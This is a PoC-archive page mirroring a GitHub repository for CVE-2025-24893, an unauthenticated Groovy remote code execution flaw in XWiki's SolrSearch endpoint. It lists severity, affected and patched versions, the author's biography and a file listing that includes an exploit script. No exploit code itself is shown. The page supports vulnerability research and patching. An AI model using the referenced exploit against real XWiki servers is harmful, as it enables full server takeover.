Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Source
https://github.com/ibadovulfat/CVE-2025-24893_HackTheBox-Editor-Writeup
Associated Vulnerability
Title:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞,该漏洞源于任何来宾用户都可以通过对SolrSearch的请求,造成远程代码执行。
Description
A critical remote code execution (RCE) vulnerability (CVE‑2025‑24893) exists in the XWiki Platform, specifically in the SolrSearch RSS feed endpoint.
Readme
# CVE-2025-24893 – XWiki Remote Code Execution (RCE)

## Overview
**CVE-2025-24893** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **XWiki**, a widely used open-source enterprise wiki platform.  
The flaw exists in the `SolrSearch` macro, which improperly evaluates Groovy expressions embedded in search queries.  

This vulnerability allows **remote, unauthenticated attackers** to execute arbitrary Groovy code on the server, potentially gaining full control of the affected system.

---

## Vulnerability Details

- **CVE ID:** CVE-2025-24893  
- **Severity:** Critical  
- **CVSS v3.1 Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  
- **EPSS Score:** 92.01% (Very high likelihood of exploitation)  
- **Published:** February 20, 2025  

---

## Affected Versions
- All versions **prior to**:
  - `15.10.11`
  - `16.4.1`
  - `16.5.0RC1`

## Patched Versions
- `15.10.11`  
- `16.4.1`  
- `16.5.0RC1`

## 👨‍💻 About Me

I'm Ulfat Ibadov, a penetration tester and cybersecurity mentor currently working with **EC-Council**. My main focus is on offensive security, including red teaming, vulnerability research, and real-world exploitation techniques.

I’ve completed multiple certifications, including:
- Certified Ethical Hacker (CEH & CEH Practical)
- Web Application Hacking and Security (W|AHS)
- Certified Cybersecurity Technician (C|CT)
- Certified Penetration Testing Specialist (CPTS – HTB Academy)
- - Certified Penetration Testing Specialist (**BBH – HTB Academy**)

I’m also an active bug bounty hunter and top-ranked participant on platforms like **TryHackMe** and **Hack The Box**, where I currently rank in the top 1%.

I'm passionate about helping others learn ethical hacking through hands-on labs and mentoring.

## 📎 Connect with Me 
- [LinkedIn](https://www.linkedin.com/in/ibadovulfat/)
- [Portfolio](https://about.surf)
File Snapshot

 [4.0K]  /data/pocs/14ec1fe3a27b9a57d146414ff490c194bedb8b90
├── [3.2K]  CVE-2025-24893.py
├── [1.0K]  LICENSE
└── [1.9K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.